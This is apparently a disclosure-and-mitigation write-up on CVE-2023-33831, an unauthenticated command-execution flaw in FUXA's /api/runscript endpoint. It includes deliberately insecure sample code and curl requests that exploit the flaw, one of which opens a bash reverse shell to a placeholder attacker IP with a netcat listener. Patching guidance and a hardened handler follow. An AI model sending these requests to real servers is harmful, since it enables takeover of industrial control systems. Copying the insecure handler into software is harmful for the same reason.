The world of open-source industrial software isn’t always safe. In May 2023, a shocking vulnerability, CVE-2023-33831, was disclosed in FUXA, a popular open-source industrial process visualization and control application. In its 1.1.13 release, a single API endpoint allowed attackers to run any command they wanted, right on the server. This simple but devastating bug serves as a critical lesson for developers and operators alike.

What is FUXA?

FUXA is a web-based SCADA (Supervisory Control and Data Acquisition) tool for modern automation. Used worldwide, it connects to industrial PLCs, lets teams monitor devices in real time, and automates actions. An insecure deployment of FUXA often sits on the same network as sensitive equipment.

Vulnerability Overview

CVE-2023-33831 is a remote command execution (RCE) flaw. It means an attacker can send a crafted HTTP request to FUXA’s /api/runscript endpoint and make the server execute any shell command. No prior authentication is required.

- Affected product: FUXA (frangoteam/fuxa)

- Affected version: 1.1.13 (and possibly earlier)

- Vulnerable endpoint: /api/runscript

Why Does This Happen?

Inside FUXA’s code, the /api/runscript endpoint was designed to let users run scripts on the server. However, no input validation or access control was used. The server simply accepted script commands from the user and ran them with a call to child_process.exec or a similar Node.js function—dangerously naive!

Example vulnerable code

// WARNING: This is insecure code for illustration!
app.post('/api/runscript', function(req, res) {
    var userScript = req.body.script;
    const { exec } = require('child_process');
    exec(userScript, (error, stdout, stderr) => {
        if (error) {
            return res.status(500).send(error.message);
        }
        res.send(stdout);
    });
});

This code takes whatever an attacker sends in the script field and runs it as a system command, returning the output.

- Server running FUXA 1.1.13

- /api/runscript open to the network (default installation)

Craft a malicious POST request:

- Endpoint: http://<victim-server>:1881/api/runscript

Suppose you want to see if the server is vulnerable. You could send:

curl -X POST http://victim-ip:1881/api/runscript \
  -H "Content-Type: application/json" \
  -d '{"script": "id"}'

This command would return the UID and group details of the user running FUXA.

Imagine you want full remote access. You could send:

curl -X POST http://victim-ip:1881/api/runscript \
  -H "Content-Type: application/json" \
  -d '{"script": "bash -c '\''bash -i >& /dev/tcp/<your-ip>/4444 >&1'\''"}'

Set up a netcat listener on your own machine:

nc -lvnp 4444

If vulnerable, the server connects back to you, and you obtain a shell.

References

- NIST NVD Advisory for CVE-2023-33831
- FUXA GitHub repository (see issues & pull requests)
- Packet Storm Security disclosure
- Exploit Database #51423

Immediate Steps

- Update FUXA Immediately: Version 1.1.14 and later include a fix for the vulnerability. Upgrade now!

- Restrict Access: Never expose FUXA to the public internet. Use firewalls and VPNs.

- Disable or Remove /api/runscript: If you don’t need this feature, comment it out in code or disable it in the config.
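
For deployments that still need a script-running endpoint, the two controls missing from the vulnerable handler shown earlier (access control and input validation) can look like the following. This is an added illustration, not FUXA's code or its actual fix; the bearer token, the allow-list and every function name are hypothetical.

```javascript
// Added example: hardened counterpart to the vulnerable handler shown earlier.
// ALLOWED_SCRIPTS, API_TOKEN and the function names are hypothetical.
const { execFile } = require('child_process');
const crypto = require('crypto');

// Constructed sample token; a real deployment loads it from a secret store.
const API_TOKEN = process.env.RUNSCRIPT_TOKEN || 'constructed-sample-token';

// Callers choose a script by id; the command line itself is fixed server-side.
const ALLOWED_SCRIPTS = Object.freeze({
    uptime: { file: 'uptime', args: [] },
    diskfree: { file: 'df', args: ['-h'] },
});

// Compare digests in constant time so the check does not leak token bytes.
function tokenMatches(presented) {
    const digest = (s) => crypto.createHash('sha256').update(s).digest();
    return crypto.timingSafeEqual(digest(String(presented)), digest(API_TOKEN));
}

// Pure decision step: an HTTP status and, only when allowed, the fixed command.
function decideRunScript(headers, body) {
    const auth = String((headers && headers.authorization) || '');
    if (!auth.startsWith('Bearer ') || !tokenMatches(auth.slice(7))) {
        return { status: 401, error: 'authentication required' };
    }
    const id = body && body.script;
    const known = typeof id === 'string' &&
        Object.prototype.hasOwnProperty.call(ALLOWED_SCRIPTS, id);
    if (!known) {
        return { status: 400, error: 'unknown script id' };
    }
    return { status: 200, command: ALLOWED_SCRIPTS[id] };
}

// Express-style handler: no shell, and no command text taken from the request.
function runScriptHandler(req, res) {
    const decision = decideRunScript(req.headers, req.body);
    if (decision.status !== 200) {
        return res.status(decision.status).send(decision.error);
    }
    const { file, args } = decision.command;
    execFile(file, args, { timeout: 5000 }, (error, stdout) => {
        if (error) {
            return res.status(500).send('script failed'); // keep error details server-side
        }
        res.send(stdout);
    });
}
```

With Express, this would be mounted as app.post('/api/runscript', runScriptHandler) behind a JSON body parser.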

Takeaway

CVE-2023-33831 is a textbook example of why strong validation and access controls matter in industrial software. Once attackers get RCE, it’s already too late—patch before that happens. Monitor your systems, lock down your network, and never trust user input blindly.

Don’t let your automation system become an attacker’s playground. Patch, audit, and defend—today.


If you found this analysis helpful, consider following FUXA’s security page for updates. For reference, always consult the official NVD entry for CVE-2023-33831.

Timeline

Published on: 09/18/2023 20:15:00 UTC
Last modified on: 09/19/2023 21:24:00 UTC